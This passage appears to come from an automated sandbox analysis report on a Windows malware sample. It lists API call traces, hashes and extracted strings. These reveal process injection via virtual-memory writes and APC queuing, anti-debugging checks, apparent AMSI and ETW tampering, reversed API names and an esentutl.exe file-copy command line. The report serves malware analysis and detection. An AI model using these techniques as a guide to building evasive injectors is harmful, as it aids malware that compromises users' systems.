                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                        • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                        • API String ID: 35162468-539270669
                                                                                                                        • Opcode ID: fcb99e2d635ab80d87aa436cb0c3793fead6110f32604764613cc9fbbb3573b7
                                                                                                                        • Instruction ID: 57acb5a526a32205496e86d799047623d7c26f0a248110121c9695ec5c7ab8bd
                                                                                                                        • Opcode Fuzzy Hash: fcb99e2d635ab80d87aa436cb0c3793fead6110f32604764613cc9fbbb3573b7
                                                                                                                        • Instruction Fuzzy Hash: 28F02730900248BFEB00A7B88888BDCFBA89F05329F2403D0D470622E1EB790A44CAA5

Control-flow Graph

APIs
  • Part of subcall function 02D34F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02D34F2E
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D4DE40), ref: 02D4DDAB
• NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02D4DE40), ref: 02D4DDDB
• NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02D4DDF0
• NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02D4DE1C
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02D4DE25
  • Part of subcall function 02D34C60: SysFreeString.OLEAUT32(02D4F4A4), ref: 02D34C6E
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
• String ID:
• API String ID: 1897104825-0
• Opcode ID: b020cbd8fa6c89ddde9eb9083e119aba9c27c1de769a0f64e142a1b159bd7d60
• Instruction ID: 3b79efffecdfbc1034d9f3c87e6d21715074a8009d88ebf65293c825b7f15850
• Opcode Fuzzy Hash: b020cbd8fa6c89ddde9eb9083e119aba9c27c1de769a0f64e142a1b159bd7d60
• Instruction Fuzzy Hash: 8A21C071A40208BFEB51EA94DC52FDE77BDEB48B00F500461B600F72C0DAB4AE048B64

Control-flow Graph

APIs
• InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D4E5F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: CheckConnectionInternet
• String ID: Initialize$OpenSession$ScanBuffer
• API String ID: 3847983778-3852638603
• Opcode ID: c1693ed1c162562df7fd7a6d1ec28eedded59394fd5ba324edd22e8f1a0208db
• Instruction ID: dfd82715519e60b0460fce59f09705d56ca09ff2ff9a8d9fcc212862ef006b47
• Opcode Fuzzy Hash: c1693ed1c162562df7fd7a6d1ec28eedded59394fd5ba324edd22e8f1a0208db
• Instruction Fuzzy Hash: F441FF35B11188ABEB02EBA4E841ADEB3FAFF88700F504825E045A7351DE78AD058F75

Control-flow Graph

APIs
  • Part of subcall function 02D34F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02D34F2E
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D4DD5E), ref: 02D4DCCB
• NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D4DD05
• NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02D4DD32
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02D4DD3B
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: FilePath$AllocCloseCreateNameName_StringWrite
• String ID:
• API String ID: 3764614163-0
• Opcode ID: d83e30d17a6b53484c978ce54f1336ad3f05e815eb50e3c1b88919300f54a6b5
• Instruction ID: 324643a3d0921ea088fccdfd8402c456dff28d965c42341c9ef6d38fbdc00624
• Opcode Fuzzy Hash: d83e30d17a6b53484c978ce54f1336ad3f05e815eb50e3c1b88919300f54a6b5
• Instruction Fuzzy Hash: 3C21CD71A40208BFEB11EAA4DD42FDEB7BDEB05B00F614561B600F72C0DBB46E048B64

Control-flow Graph

APIs
  • Part of subcall function 02D481CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D4823C,?,?,00000000,?,02D47A7E,ntdll,00000000,00000000,02D47AC3,?,?,00000000), ref: 02D4820A
  • Part of subcall function 02D481CC: GetModuleHandleA.KERNELBASE(?), ref: 02D4821E
  • Part of subcall function 02D48274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D482FC,?,?,00000000,00000000,?,02D48215,00000000,KernelBASE,00000000,00000000,02D4823C), ref: 02D482C1
  • Part of subcall function 02D48274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D482C7
  • Part of subcall function 02D48274: GetProcAddress.KERNEL32(?,?), ref: 02D482D9
• CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02D48814
Strings
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: HandleModule$AddressProc$CreateProcessUser
• String ID: CreateProcessAsUserW$Kernel32
• API String ID: 3130163322-2353454454
• Opcode ID: 3fc58effa7842c889ae228205c9f10c6627d7da20dcc9b1657b40cec346bf094
• Instruction ID: f51e1accf64b2de770cd924a7ac5f8bf5bfbc6f02e2e411cc3aba80973b43000
• Opcode Fuzzy Hash: 3fc58effa7842c889ae228205c9f10c6627d7da20dcc9b1657b40cec346bf094
• Instruction Fuzzy Hash: DD11D6B2640248EFEB42EE98EC51F9A77EDEB4CB50F514410BA08E3340C634ED109B24
APIs
  • Part of subcall function 02D481CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D4823C,?,?,00000000,?,02D47A7E,ntdll,00000000,00000000,02D47AC3,?,?,00000000), ref: 02D4820A
  • Part of subcall function 02D481CC: GetModuleHandleA.KERNELBASE(?), ref: 02D4821E
  • Part of subcall function 02D48274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D482FC,?,?,00000000,00000000,?,02D48215,00000000,KernelBASE,00000000,00000000,02D4823C), ref: 02D482C1
  • Part of subcall function 02D48274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D482C7
  • Part of subcall function 02D48274: GetProcAddress.KERNEL32(?,?), ref: 02D482D9
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D47A9F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: HandleModule$AddressProc$AllocateMemoryVirtual
• String ID: ntdll$yromeMlautriVetacollAwZ
• API String ID: 4072585319-445027087
• Opcode ID: 7f0a91a3aecb236d981c91613cb142390d42b8d112567ec7833ce0bcb75200a3
• Instruction ID: fd72b26842810d39d7108752e1ea74f99a86ccebded6a61ef064039cb7abdf36
• Opcode Fuzzy Hash: 7f0a91a3aecb236d981c91613cb142390d42b8d112567ec7833ce0bcb75200a3
• Instruction Fuzzy Hash: 4C110976644208BFEB05EFA4EC51EAAB7AEEB48B00F514461B904D7740DA34AE148B74
APIs
  • Part of subcall function 02D481CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D4823C,?,?,00000000,?,02D47A7E,ntdll,00000000,00000000,02D47AC3,?,?,00000000), ref: 02D4820A
  • Part of subcall function 02D481CC: GetModuleHandleA.KERNELBASE(?), ref: 02D4821E
  • Part of subcall function 02D48274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D482FC,?,?,00000000,00000000,?,02D48215,00000000,KernelBASE,00000000,00000000,02D4823C), ref: 02D482C1
  • Part of subcall function 02D48274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D482C7
  • Part of subcall function 02D48274: GetProcAddress.KERNEL32(?,?), ref: 02D482D9
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D47A9F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: HandleModule$AddressProc$AllocateMemoryVirtual
• String ID: ntdll$yromeMlautriVetacollAwZ
• API String ID: 4072585319-445027087
• Opcode ID: 1f317573dde9cd81147298677331e282ea7d054f5a6cd4d689d8a71d7b6fd4bd
• Instruction ID: 2249fde1bbe607c024d2169e01fa3badfce9c694832df625ca0970262976358e
• Opcode Fuzzy Hash: 1f317573dde9cd81147298677331e282ea7d054f5a6cd4d689d8a71d7b6fd4bd
• Instruction Fuzzy Hash: D9111776644208FFEB05EFA4EC92E9EB7AEEB48B00F514461B904D7740DA34AE148F74
APIs
  • Part of subcall function 02D481CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D4823C,?,?,00000000,?,02D47A7E,ntdll,00000000,00000000,02D47AC3,?,?,00000000), ref: 02D4820A
  • Part of subcall function 02D481CC: GetModuleHandleA.KERNELBASE(?), ref: 02D4821E
  • Part of subcall function 02D48274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D482FC,?,?,00000000,00000000,?,02D48215,00000000,KernelBASE,00000000,00000000,02D4823C), ref: 02D482C1
  • Part of subcall function 02D48274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D482C7
  • Part of subcall function 02D48274: GetProcAddress.KERNEL32(?,?), ref: 02D482D9
• NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D47DEC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: HandleModule$AddressProc$MemoryVirtualWrite
• String ID: Ntdll$yromeMlautriVetirW
                                                                                                                        • API String ID: 2719805696-3542721025
APIs
  • Part of subcall function 02D481CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D4823C,?,?,00000000,?,02D47A7E,ntdll,00000000,00000000,02D47AC3,?,?,00000000), ref: 02D4820A
  • Part of subcall function 02D481CC: GetModuleHandleA.KERNELBASE(?), ref: 02D4821E
  • Part of subcall function 02D48274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D482FC,?,?,00000000,00000000,?,02D48215,00000000,KernelBASE,00000000,00000000,02D4823C), ref: 02D482C1
  • Part of subcall function 02D48274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D482C7
  • Part of subcall function 02D48274: GetProcAddress.KERNEL32(?,?), ref: 02D482D9
• NtQueueApcThread.NTDLL(?,?,?,?,?), ref: 02D48761
Strings
Yara matches
Similarity
• API ID: HandleModule$AddressProc$QueueThread
• String ID: NtQueueApcThread$ntdll
• API String ID: 3075473611-1374908105
APIs
• RtlI.N(?,?,00000000,02D4DC7E), ref: 02D4DC2C
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02D4DC7E), ref: 02D4DC42
• NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02D4DC7E), ref: 02D4DC61
Yara matches
Similarity
• API ID: Path$DeleteFileNameName_
• String ID:
• API String ID: 4284456518-0
APIs
  • Part of subcall function 02D34F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02D34F2E
• RtlI.N(?,?,00000000,02D4DC7E), ref: 02D4DC2C
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02D4DC7E), ref: 02D4DC42
• NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02D4DC7E), ref: 02D4DC61
  • Part of subcall function 02D34C60: SysFreeString.OLEAUT32(02D4F4A4), ref: 02D34C6E
Yara matches
Similarity
• API ID: PathString$AllocDeleteFileFreeNameName_
• String ID:
• API String ID: 1530111750-0
APIs
  • Part of subcall function 02D46D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02D46DB9,?,?,?,00000000), ref: 02D46D99
• CoCreateInstance.OLE32(?,00000000,00000005,02D46EAC,00000000,00000000,02D46E2B,?,00000000,02D46E9B), ref: 02D46E17
Yara matches
Similarity
• API ID: CreateFromInstanceProg
• String ID:
• API String ID: 2151042543-0
APIs
• InetIsOffline.URL(00000000,00000000,02D5B784,?,?,?,00000000,00000000), ref: 02D4F801
  • Part of subcall function 02D489D0: FreeLibrary.KERNEL32(74FA0000,00000000,00000000,00000000,00000000,02DB738C,Function_0000662C,00000004,02DB739C,02DB738C,05F5E103,00000040,02DB73A0,74FA0000,00000000,00000000), ref: 02D48AAA
  • Part of subcall function 02D4F6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02D4FAEB,UacInitialize,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,ScanBuffer,02DB7380,02D5B7B8,ScanString,02DB7380,02D5B7B8,Initialize), ref: 02D4F6EE
  • Part of subcall function 02D4F6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02D4F700
  • Part of subcall function 02D4F744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02D4F754
  • Part of subcall function 02D4F744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02D4F766
  • Part of subcall function 02D4F744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02D4F77D
  • Part of subcall function 02D37E5C: GetFileAttributesA.KERNEL32(00000000,?,02D5041F,ScanString,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,ScanString,02DB7380,02D5B7B8,UacScan,02DB7380,02D5B7B8,UacInitialize), ref: 02D37E67
  • Part of subcall function 02D3C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02EAB8B8,?,02D50751,ScanBuffer,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,ScanBuffer,02DB7380,02D5B7B8,OpenSession), ref: 02D3C37B
  • Part of subcall function 02D4DD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D4DE40), ref: 02D4DDAB
  • Part of subcall function 02D4DD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02D4DE40), ref: 02D4DDDB
  • Part of subcall function 02D4DD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02D4DDF0
  • Part of subcall function 02D4DD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02D4DE1C
  • Part of subcall function 02D4DD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02D4DE25
  • Part of subcall function 02D37E80: GetFileAttributesA.KERNEL32(00000000,?,02D5356F,ScanString,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,ScanBuffer,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,Initialize), ref: 02D37E8B
  • Part of subcall function 02D38048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02D5370D,OpenSession,02DB7380,02D5B7B8,ScanString,02DB7380,02D5B7B8,Initialize,02DB7380,02D5B7B8,ScanString,02DB7380,02D5B7B8), ref: 02D38055
Strings
Yara matches
Similarity
• API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
• String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZER$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
• API String ID: 297057983-2894825931

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02D489D0: FreeLibrary.KERNEL32(74FA0000,00000000,00000000,00000000,00000000,02DB738C,Function_0000662C,00000004,02DB739C,02DB738C,05F5E103,00000040,02DB73A0,74FA0000,00000000,00000000), ref: 02D48AAA
                                                                                                                        • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02EAB7E0,02EAB824,OpenSession,02DB7380,02D5B7B8,UacScan,02DB7380), ref: 02D586E9
                                                                                                                        • ResumeThread.KERNEL32(000008AC,ScanBuffer,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,UacScan,02DB7380,02D5B7B8,ScanBuffer,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8), ref: 02D58D33
                                                                                                                          • Part of subcall function 02D48730: NtQueueApcThread.NTDLL(?,?,?,?,?), ref: 02D48761
                                                                                                                        • CloseHandle.KERNEL32(000008A8,ScanBuffer,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,UacScan,02DB7380,02D5B7B8,000008AC,ScanBuffer,02DB7380,02D5B7B8,OpenSession,02DB7380), ref: 02D58EB2
                                                                                                                          • Part of subcall function 02D4894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02DB73A8,02D4A587,ScanString,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,Initialize,02DB73A8,02D4A93C,UacScan), ref: 02D48960
                                                                                                                          • Part of subcall function 02D4894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D4897A
                                                                                                                          • Part of subcall function 02D4894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02DB73A8,02D4A587,ScanString,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,Initialize), ref: 02D489B6
                                                                                                                        • CloseHandle.KERNEL32(000008A8,000008A8,ScanBuffer,02DB7380,02D5B7B8,UacInitialize,02DB7380,02D5B7B8,ScanBuffer,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,UacScan,02DB7380), ref: 02D592A4
                                                                                                                          • Part of subcall function 02D37E5C: GetFileAttributesA.KERNEL32(00000000,?,02D5041F,ScanString,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,ScanString,02DB7380,02D5B7B8,UacScan,02DB7380,02D5B7B8,UacInitialize), ref: 02D37E67
                                                                                                                          • Part of subcall function 02D4DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D4DD5E), ref: 02D4DCCB
                                                                                                                          • Part of subcall function 02D4DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D4DD05
                                                                                                                          • Part of subcall function 02D4DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02D4DD32
                                                                                                                          • Part of subcall function 02D4DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02D4DD3B
                                                                                                                          • Part of subcall function 02D48338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02D483C2), ref: 02D483A4
                                                                                                                        • ExitProcess.KERNEL32(00000000,OpenSession,02DB7380,02D5B7B8,ScanBuffer,02DB7380,02D5B7B8,Initialize,02DB7380,02D5B7B8,00000000,00000000,00000000,ScanString,02DB7380,02D5B7B8), ref: 02D5B2FA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseFileLibrary$CreateFreeHandlePathProcessThread$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcQueueResumeUserWrite
                                                                                                                        • String ID: 